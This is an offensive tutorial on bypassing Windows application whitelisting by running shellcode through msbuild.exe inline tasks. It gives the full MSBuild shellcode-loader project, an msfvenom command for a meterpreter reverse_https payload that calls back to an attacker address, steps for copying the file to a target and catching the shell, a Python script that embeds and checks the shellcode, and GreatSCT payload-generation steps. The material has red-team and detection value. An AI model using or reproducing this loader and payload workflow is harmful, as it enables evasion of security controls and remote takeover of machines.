Application Whitelisting Bypass: msbuild.exe

Background

Casey Smith (@subTee) showed that msbuild.exe, the signed Microsoft build engine that ships with the .NET Framework, can be made to compile and run arbitrary C# code and so bypass application whitelisting. He wrote a blog post on Tuesday, September 13, 2016 titled “Bypassing Application Whitelisting using MSBuild.exe – Device Guard Example and Mitigations”. His blog is no longer available; however, you can access it via archive.org here.

Proof of Concept

You can also download the proof of concept from here.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <!-- Note: the P/Invoke signatures below declare pointers as UInt32, so this only
       works with the 32-bit MSBuild (Framework, not Framework64) and x86 shellcode. -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class ClassExample : Task, ITask
        {
          private static UInt32 MEM_COMMIT = 0x1000;
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

          [DllImport("kernel32")]
          private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

          [DllImport("kernel32")]
          private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
          );

          [DllImport("kernel32")]
          private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
          );

          public override bool Execute()
          {
            // Paste only the comma-separated bytes from msfvenom's "-f csharp" output here.
            byte[] shellcode = new byte[] { INSERT_SHELLCODE_HERE };

            // Allocate RWX memory, copy the shellcode in, run it on a new thread and wait for it.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
              MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            IntPtr pinfo = IntPtr.Zero;
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return true;
          }
        }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

How it works

Here’s a direct quote from Casey’s blog post. It’s pretty simple: “msbuild.exe” will compile and run C# code for you.

Turns out, MSBuild.exe has a built in capability called “Inline Tasks”.  These are snippets of C# code that can be used to enrich the C# build process.  
Essentially, what this does, is take an XML file, compile and execute in memory on the target, so it is not a traditional image/module execution event.

Tutorial

Manual

Download the proof of concept from here. Use Metasploit to generate C# shellcode with the following command: “msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -f csharp”. Replace the value of LHOST with your own IP address. msfvenom wraps the bytes in a declaration of the form “byte[] buf = new byte[N] { ... };”; replace “INSERT_SHELLCODE_HERE” in the template with only the comma-separated hex bytes between the braces, not the whole declaration, or the inline task will fail to compile. The template declares its P/Invoke pointers as UInt32, so keep the shellcode x86 (-a x86) and run the 32-bit MSBuild from the Framework directory.

Start your Metasploit listener in msfconsole. Copy your “msbuild.exe” XML file to the target system. In my case, this is Windows 10 Enterprise. Execute the payload with the following command: “C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe shellcode.xml”.

Process Hacker shows an established TCP connection to our IP address. Let’s check Metasploit for our shell.
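As an added example (not part of the original post, and not Casey Smith’s or GreatSCT’s code), the following Python script automates the manual step above: it pulls the bytes out of msfvenom’s “-f csharp” output, drops them into the template in place of INSERT_SHELLCODE_HERE, and sanity-checks the result before you copy the file over. The script name, the cut-down stand-in template and the placeholder bytes 0x41..0x46 (not shellcode) are assumptions for running it offline; pass the real SimpleTasks template and the msfvenom output as arguments to use it for real.

```python
"""Fill the page's MSBuild inline-task template from msfvenom -f csharp output.

Added example, not code from the original post or from Casey Smith.
Assumptions: the template carries the literal placeholder INSERT_SHELLCODE_HERE
exactly as shown on the page, and the shellcode text is what msfvenom prints
for -f csharp, i.e.  byte[] buf = new byte[N] { 0x.., 0x.., ... };
Only the comma-separated bytes belong between the template's braces; pasting
the whole declaration leaves an extra 'byte[] buf = new byte[N] {' and '};'
inside the initializer and the inline task no longer compiles.
"""
import re
import sys
import xml.etree.ElementTree as ET

PLACEHOLDER = "INSERT_SHELLCODE_HERE"
MSBUILD_NS = "{http://schemas.microsoft.com/developer/msbuild/2003}"
_DECL_RE = re.compile(r"new\s+byte\[(\d*)\]\s*\{(.*?)\}", re.DOTALL)
_BYTE_RE = re.compile(r"0x[0-9a-fA-F]{1,2}")

# Constructed stand-in for the page's SimpleTasks template (assumption): it keeps
# only the parts this script looks at. Pass the real file as argv[1] instead.
MINI_TEMPLATE = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello"><ClassExample /></Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs"><![CDATA[
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
      byte[] shellcode = new byte[] { INSERT_SHELLCODE_HERE };
    ]]></Code></Task>
  </UsingTask>
</Project>
"""

# Constructed msfvenom-style output with placeholder bytes (0x41..0x46 is not shellcode).
SAMPLE_MSFVENOM = "byte[] buf = new byte[6] {\n0x41,0x42,0x43,0x44,0x45,0x46\n};\n"


def extract_bytes(csharp_output):
    """Return the '0x..' tokens from the initializer in msfvenom's csharp output.

    Raises ValueError if the declared length disagrees with the byte count,
    which is what a truncated copy/paste looks like."""
    m = _DECL_RE.search(csharp_output)
    if not m:
        raise ValueError("no 'new byte[N] { ... }' initializer found")
    declared, tokens = m.group(1), _BYTE_RE.findall(m.group(2))
    if not tokens:
        raise ValueError("initializer holds no bytes")
    if declared and int(declared) != len(tokens):
        raise ValueError("declared %s bytes, found %d" % (declared, len(tokens)))
    return tokens


def build_project(template, tokens, width=16):
    """Replace the placeholder with the bytes, wrapped `width` per line."""
    if template.count(PLACEHOLDER) != 1:
        raise ValueError("template must contain %s exactly once" % PLACEHOLDER)
    rows = [",".join(tokens[i:i + width]) for i in range(0, len(tokens), width)]
    return template.replace(PLACEHOLDER, ",\n".join(rows))


def check_project(xml_text, expected):
    """Sanity checks before the file is copied to the target: the XML still
    parses, the placeholder is gone, the initializer holds the expected number
    of bytes, and a template with 32-bit P/Invoke signatures (UInt32 pointers,
    as on the page) is not pointed at the Framework64 build-tasks assembly.
    The bitness check is an assumption about the two MSBuild install paths."""
    root = ET.fromstring(xml_text)  # ParseError here means the XML was damaged
    using_task = root.find(MSBUILD_NS + "UsingTask")
    code = using_task.find(MSBUILD_NS + "Task/" + MSBUILD_NS + "Code")
    body = code.text or ""
    m = _DECL_RE.search(body)
    found = len(_BYTE_RE.findall(m.group(2))) if m else 0
    is_x86_template = "UInt32 lpStartAddr" in body
    assembly = using_task.get("AssemblyFile", "")
    return {
        "placeholder_filled": PLACEHOLDER not in body,
        "byte_count_ok": found == expected,
        "bitness_consistent": not (is_x86_template and "Framework64" in assembly),
    }


if __name__ == "__main__":
    # usage (script name is an assumption):
    #   python3 build_msbuild_payload.py SimpleTasks.csproj shellcode.cs shellcode.xml
    if len(sys.argv) == 4:
        with open(sys.argv[1]) as f:
            template = f.read()
        with open(sys.argv[2]) as f:
            csharp = f.read()
        out_path = sys.argv[3]
    else:
        template, csharp, out_path = MINI_TEMPLATE, SAMPLE_MSFVENOM, None
    tokens = extract_bytes(csharp)
    project = build_project(template, tokens)
    results = check_project(project, len(tokens))
    if out_path:
        with open(out_path, "w") as f:
            f.write(project)
    print("%d bytes embedded; checks: %s" % (len(tokens), results))
```

Run it with no arguments to see it work on the constructed sample; with three arguments it writes the filled project file. The byte-count check against the “new byte[N]” length is the one that catches a shellcode blob that was cut off while copying between machines, which otherwise only shows up as a compile error on the target.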

Automated

We’re going to use GreatSCT to generate a “msbuild.exe” payload.

  • git clone https://github.com/GreatSCT/GreatSCT.git
  • cd GreatSCT
  • python3 ./gr8sct.py

Press any key to begin.

Select option number “zero” (0) and press enter.

Configure any options as desired with “set”, i.e. “set 2 80” or “set ListenerPort 80”. Type “generate” and press enter.

Copy your payload to your target and follow the instructions to execute.

Process Hacker shows an established TCP connection to our IP address. Let’s check Metasploit for our shell.
